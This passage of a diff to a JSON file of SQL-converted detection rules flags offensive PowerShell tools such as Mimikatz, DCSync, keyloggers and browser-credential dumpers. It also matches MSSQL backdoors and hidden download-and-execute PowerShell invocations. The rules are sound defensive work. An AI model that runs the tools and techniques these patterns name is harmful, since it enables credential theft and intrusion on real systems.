OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE 